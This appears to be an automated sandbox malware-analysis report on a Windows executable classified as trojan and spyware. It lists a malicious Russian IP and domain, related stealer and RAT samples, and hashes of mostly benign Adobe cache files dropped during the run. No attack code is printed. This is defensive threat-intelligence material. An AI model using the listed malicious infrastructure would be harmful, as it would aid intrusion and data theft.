                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    194.190.152.201
                                                    tbdcic.infoRussian Federation
                                                    41615RSHB-ASRUtrue
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1579878
                                                    Start date and time:2024-12-23 13:28:11 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 44s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:43
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:T8xrZb7nBL.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
                                                    Detection:MAL
                                                    Classification:mal84.troj.spyw.evad.winEXE@69/63@4/1
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:Failed
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 52.22.41.97, 52.6.155.20, 3.219.243.226, 3.233.129.217, 23.195.39.65, 199.232.210.172, 23.32.239.56, 2.19.198.27, 184.30.20.134, 2.16.168.102, 2.16.168.117, 23.32.239.9, 13.107.246.63, 23.218.208.109, 34.237.241.83, 172.202.163.200
                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: T8xrZb7nBL.exe
                                                    TimeTypeDescription
                                                    07:29:28API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                    09:22:29API Interceptor3716047x Sleep call for process: browser_sn.exe modified
                                                    09:22:39API Interceptor1195x Sleep call for process: timeout.exe modified
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    bg.microsoft.map.fastly.neteszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                    • 199.232.210.172
                                                    0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                    • 199.232.210.172
                                                    #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                    • 199.232.210.172
                                                    p3a0oZ4U7X.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                    • 199.232.214.172
                                                    #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    • 199.232.214.172
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    RSHB-ASRUScan_Zakaz_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                    • 194.190.152.129
                                                    Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                    • 194.190.152.129
                                                    document.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                    • 194.190.152.129
                                                    tiago.exeGet hashmaliciousReverse SSHBrowse
                                                    • 194.190.152.129
                                                    0EZ9Ho3Ruc.exeGet hashmaliciousRedLineBrowse
                                                    • 194.190.152.148
                                                    Paralysis Hack.exeGet hashmaliciouszgRATBrowse
                                                    • 194.190.153.137
                                                    file.exeGet hashmalicious000StealerBrowse
                                                    • 194.190.152.193
                                                    EgNIXduB6T.exeGet hashmaliciousErbium StealerBrowse
                                                    • 194.190.152.194
                                                    2MNB4UhUqR.exeGet hashmaliciousRedLineBrowse
                                                    • 194.190.152.20
                                                    w9d568i4Ia.exeGet hashmaliciousDCRatBrowse
                                                    • 194.190.152.128
                                                    No context
                                                    No context
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):300
                                                    Entropy (8bit):5.255079938416293
                                                    Encrypted:false
                                                    SSDEEP:6:j2LfLM+q2PcNwi2nKuAl9OmbnIFUt8i2LboZmw+i2LbLMVkwOcNwi2nKuAl9Omb5:j2T4+vLZHAahFUt8i2Xo/+i2X4V54ZHi
                                                    MD5:A189220DD9B1FCCEAF9438C462D20F83
                                                    SHA1:13AA000F7C1047545D5BE2AD7EA027B681219AA4
                                                    SHA-256:209D769B371D09889FC98C54C3CBAC45046FF682F64B6E856A5130A1FA448F56
                                                    SHA-512:B9BDCBF182AFA24552B819EE7D5A68EAF5FABEEF1604E815E80D2D826071A62E06BF67C04155AD34B3C2EC82A4CDCAC74DA006E5E2E6567F857C4681A3537355
                                                    Malicious:false
                                                    Preview:2024/12/23-07:29:17.631 1fac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:29:17.635 1fac Recovering log #3.2024/12/23-07:29:17.635 1fac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):300
                                                    Entropy (8bit):5.255079938416293
                                                    Encrypted:false
                                                    SSDEEP:6:j2LfLM+q2PcNwi2nKuAl9OmbnIFUt8i2LboZmw+i2LbLMVkwOcNwi2nKuAl9Omb5:j2T4+vLZHAahFUt8i2Xo/+i2X4V54ZHi
                                                    MD5:A189220DD9B1FCCEAF9438C462D20F83
                                                    SHA1:13AA000F7C1047545D5BE2AD7EA027B681219AA4
                                                    SHA-256:209D769B371D09889FC98C54C3CBAC45046FF682F64B6E856A5130A1FA448F56
                                                    SHA-512:B9BDCBF182AFA24552B819EE7D5A68EAF5FABEEF1604E815E80D2D826071A62E06BF67C04155AD34B3C2EC82A4CDCAC74DA006E5E2E6567F857C4681A3537355
                                                    Malicious:false
                                                    Preview:2024/12/23-07:29:17.631 1fac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:29:17.635 1fac Recovering log #3.2024/12/23-07:29:17.635 1fac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):341
                                                    Entropy (8bit):5.186108591944854
                                                    Encrypted:false
                                                    SSDEEP:6:j2LS1yq2PcNwi2nKuAl9Ombzo2jMGIFUt8i2LQ1Zmw+i2L9v31RkwOcNwi2nKuAv:j2m4vLZHAa8uFUt8i2k1/+i2xD54ZHAv
                                                    MD5:1C0AEF846AEBBD2236CE94F6D0917E20
                                                    SHA1:C3B03EE2376E78F81CD80EDDAC2195B5D87B8C7B
                                                    SHA-256:A12110A7A776B42FF91D4234292EA7125BAB2FF6FF25339CDA8F4401441623F1
                                                    SHA-512:4A4D49B676931B6E1A36C922C07A8FA56A236AFB56C1EF000F83B74343397FF4224C1C426835C5A0043EB99750489FA3AA625CD0AB68C0655BF0D1A900A8DC45
                                                    Malicious:false
                                                    Preview:2024/12/23-07:29:17.788 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:29:17.791 ea0 Recovering log #3.2024/12/23-07:29:17.794 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):341
                                                    Entropy (8bit):5.186108591944854
                                                    Encrypted:false
                                                    SSDEEP:6:j2LS1yq2PcNwi2nKuAl9Ombzo2jMGIFUt8i2LQ1Zmw+i2L9v31RkwOcNwi2nKuAv:j2m4vLZHAa8uFUt8i2k1/+i2xD54ZHAv
                                                    MD5:1C0AEF846AEBBD2236CE94F6D0917E20
                                                    SHA1:C3B03EE2376E78F81CD80EDDAC2195B5D87B8C7B
                                                    SHA-256:A12110A7A776B42FF91D4234292EA7125BAB2FF6FF25339CDA8F4401441623F1
                                                    SHA-512:4A4D49B676931B6E1A36C922C07A8FA56A236AFB56C1EF000F83B74343397FF4224C1C426835C5A0043EB99750489FA3AA625CD0AB68C0655BF0D1A900A8DC45
                                                    Malicious:false
                                                    Preview:2024/12/23-07:29:17.788 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:29:17.791 ea0 Recovering log #3.2024/12/23-07:29:17.794 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:modified
                                                    Size (bytes):475
                                                    Entropy (8bit):4.975614667422717
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sq8sBdOg2HbkAcaq3QYiubSpDyP7E4TX:Y2sRds0dMHYr3QYhbSpDa7n7
                                                    MD5:73DEF8459962BCCDD4C4B325F47FDD67
                                                    SHA1:9D5C26008F69078D3C1D84E7A56189F3C0A62D35
                                                    SHA-256:E0A86C0461071B47244F13FA4E431E7E15315AEBC80CD3E239E0F749066E0602
                                                    SHA-512:A4DA3301D9A1693B5820239A768F06E34978D39C471DC7A36EF6486660788DAE153D6DE9E8B57621710BE325AD6617F1FBC5020C9981AF56FD62A5F8D5008EC3
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379516966579285","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":462605},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):475
                                                    Entropy (8bit):4.975614667422717
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sq8sBdOg2HbkAcaq3QYiubSpDyP7E4TX:Y2sRds0dMHYr3QYhbSpDa7n7
                                                    MD5:73DEF8459962BCCDD4C4B325F47FDD67
                                                    SHA1:9D5C26008F69078D3C1D84E7A56189F3C0A62D35
                                                    SHA-256:E0A86C0461071B47244F13FA4E431E7E15315AEBC80CD3E239E0F749066E0602
                                                    SHA-512:A4DA3301D9A1693B5820239A768F06E34978D39C471DC7A36EF6486660788DAE153D6DE9E8B57621710BE325AD6617F1FBC5020C9981AF56FD62A5F8D5008EC3
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379516966579285","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":462605},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4099
                                                    Entropy (8bit):5.233760369244817
                                                    Encrypted:false
                                                    SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPKH47yhv:CwNw1GHqPySfkcigoO3h28ytPP7yhv
                                                    MD5:08EC6B1FBAF9F6B808641A190EB95A8D
                                                    SHA1:AF19005995E8BC767460095416764D60D18ECE48
                                                    SHA-256:E6F20C32958D7F5C921CCD118D9D9EB570E87646EC40F542403647B810952F60
                                                    SHA-512:9CDD27246FE84FCAB9B2D153C2FA066D00E4B71FBD791203A2C22EE08A2B4FB47D00CD4B755B5A8C18BB49BCFD82BFE2092A6D42ECE4E150C26BF7FC7EFF4B6E
                                                    Malicious:false
                                                    Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):329
                                                    Entropy (8bit):5.221879761519808
                                                    Encrypted:false
                                                    SSDEEP:6:j2LP1yq2PcNwi2nKuAl9OmbzNMxIFUt8i2LRx811Zmw+i2LRX6oRkwOcNwi2nKuP:j2svLZHAa8jFUt8i2Y11/+i24w54ZHAo
                                                    MD5:C2DBB5910051D7ADE69324DB94825A79
                                                    SHA1:3B4EAAD60A82667928FB167126605D86F5AF1917
                                                    SHA-256:A238EC803AFCC3C33AB11ABB7AF9FF4DA4B8D01B63BF2B13CE8F009D3AD2C74B
                                                    SHA-512:1D4864BA6CA40344C349CC91FE5EAA924DDF54E490B4E51069C37A2FE22686A5FCD5C693D3FFC51D0F39D1AC0345165F21770C08BC20354EBA73E82FF8CF02E7
                                                    Malicious:false
                                                    Preview:2024/12/23-07:29:17.859 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:29:17.861 ea0 Recovering log #3.2024/12/23-07:29:17.862 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):329
                                                    Entropy (8bit):5.221879761519808
                                                    Encrypted:false
                                                    SSDEEP:6:j2LP1yq2PcNwi2nKuAl9OmbzNMxIFUt8i2LRx811Zmw+i2LRX6oRkwOcNwi2nKuP:j2svLZHAa8jFUt8i2Y11/+i24w54ZHAo
                                                    MD5:C2DBB5910051D7ADE69324DB94825A79
                                                    SHA1:3B4EAAD60A82667928FB167126605D86F5AF1917
                                                    SHA-256:A238EC803AFCC3C33AB11ABB7AF9FF4DA4B8D01B63BF2B13CE8F009D3AD2C74B
                                                    SHA-512:1D4864BA6CA40344C349CC91FE5EAA924DDF54E490B4E51069C37A2FE22686A5FCD5C693D3FFC51D0F39D1AC0345165F21770C08BC20354EBA73E82FF8CF02E7
                                                    Malicious:false
                                                    Preview:2024/12/23-07:29:17.859 ea0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:29:17.861 ea0 Recovering log #3.2024/12/23-07:29:17.862 ea0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):66934
                                                    Entropy (8bit):2.436424201832609
                                                    Encrypted:false
                                                    SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                    MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                    SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                    SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                    SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                    Malicious:false
                                                    Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                    Category:dropped
                                                    Size (bytes):86016
                                                    Entropy (8bit):4.439006730459014
                                                    Encrypted:false
                                                    SSDEEP:384:yeaci5GQiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:18urVgazUpUTTGt
                                                    MD5:503E02698B3E9A8731889302C4CBCB46
                                                    SHA1:32754ADD034A09C8EE280590BBEA05C2A7AF3D47
                                                    SHA-256:1E99A4A184BCB86FFA101BB43FFA800F2699B8BCDEBA15E97E2E2BDBE170BBEA
                                                    SHA-512:A989CAF81460EE73A8E5AACAD0A43401281F5EDDDC3DBBDE079F979BAB60BB44C13825DF192A76FBBE88B14A9946DDA4ED76429A27BBE750618768F428731CCD
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.774788949899456
                                                    Encrypted:false
                                                    SSDEEP:48:7M2p/E2ioyViuioy3DoWoy1CABoy1p9KOioy1noy1AYoy1Wioy1hioybioyfPoyn:7Rpju30iANXKQGWb9IVXEBodRBkI
                                                    MD5:F4F1417BBA25D54A0F160F23579D3A92
                                                    SHA1:3F6FAE98A78415D31B87EC6CFD459DB43A1A8186
                                                    SHA-256:EB309DEF8D9A1F45BF52504072222FF161E2D0819D4D3AED350355F6D2DE4743
                                                    SHA-512:73C60089F54F96122D093637ECA7A795904EB3C7FF39DA94396588AC5C6E2711D70621CA3A550C00C377DBF896CA4C6A0379B1168DD276202C9285EF6B80C11E
                                                    Malicious:false
                                                    Preview:.... .c...../..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:Certificate, Version=3
                                                    Category:dropped
                                                    Size (bytes):1391
                                                    Entropy (8bit):7.705940075877404
                                                    Encrypted:false
                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                    Malicious:false
                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                    Category:dropped
                                                    Size (bytes):71954
                                                    Entropy (8bit):7.996617769952133
                                                    Encrypted:true
                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                    Malicious:false
                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):192
                                                    Entropy (8bit):2.7485180290352824
                                                    Encrypted:false
                                                    SSDEEP:3:kkFklPJwhfllXlE/HT8k8XzXNNX8RolJuRdxLlGB9lQRYwpDdt:kKsZT8vNMa8RdWBwRd
                                                    MD5:6EB414C3FDF0BD94E9706676E3915390
                                                    SHA1:F1D93DA7ACC9079519203BFE75324C15BE6AF080
                                                    SHA-256:B8D0FD7CC97372083F46394509ED14BC52352E2F5050707150539B0B03F839AB
                                                    SHA-512:F9BD8EA25CD1E23266888771C1DDBD22EBBE856052B120802C4FD5EFAFA8644C155A2CF05BD71118005F4B127C8ED6004A69C29B599A6355AD5BB3D04CEB521B
                                                    Malicious:false
                                                    Preview:p...... ..........KO6U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):328
                                                    Entropy (8bit):3.238004231589766
                                                    Encrypted:false
                                                    SSDEEP:6:kKDn9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:CDImsLNkPlE99SNxAhUe/3
                                                    MD5:280AAB2CA222219C272C013EE1913E75
                                                    SHA1:0803C9215B1DE7CE416698E1727B2F16D12ED96C
                                                    SHA-256:55A8A1C7CF977B5795CE068E40752D0D37D97C6092982FC3293F58F6B5545A63
                                                    SHA-512:8729C90269994B9C196C366780F8A51A6A2BA705DF1318C43C9EB207FAB586BD17BDA109D2B28973B52C19E6471C2A56650F72A8215E0D01008E6AFEDEC25FAA
                                                    Malicious:false
                                                    Preview:p...... ........ZF8b6U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):295
                                                    Entropy (8bit):5.379988058598537
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJM3g98kUwPeUkwRe9:YvXKXWIf5WsdTeO+sGMbLUkee9
                                                    MD5:3F32F3E598D7140EF3FA4F395DB6E25B
                                                    SHA1:1A2D5ED0445BDF40D7AB25843D65D6759BB004D4
                                                    SHA-256:B46C25AE6E2D2B0A6F7CAC4AE6E01BFD67876EAE1D372D1BFF859034863ECD37
                                                    SHA-512:76C60C54448EC75E538212CF994D0E912F0A3DAD5F28E35DD4523BA68B115D9DB0C110D5F761E494AED2C39BCC4320051955C569E2FE7E9F892C62DFAC958835
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.314972506359147
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfBoTfXpnrPeUkwRe9:YvXKXWIf5WsdTeO+sGWTfXcUkee9
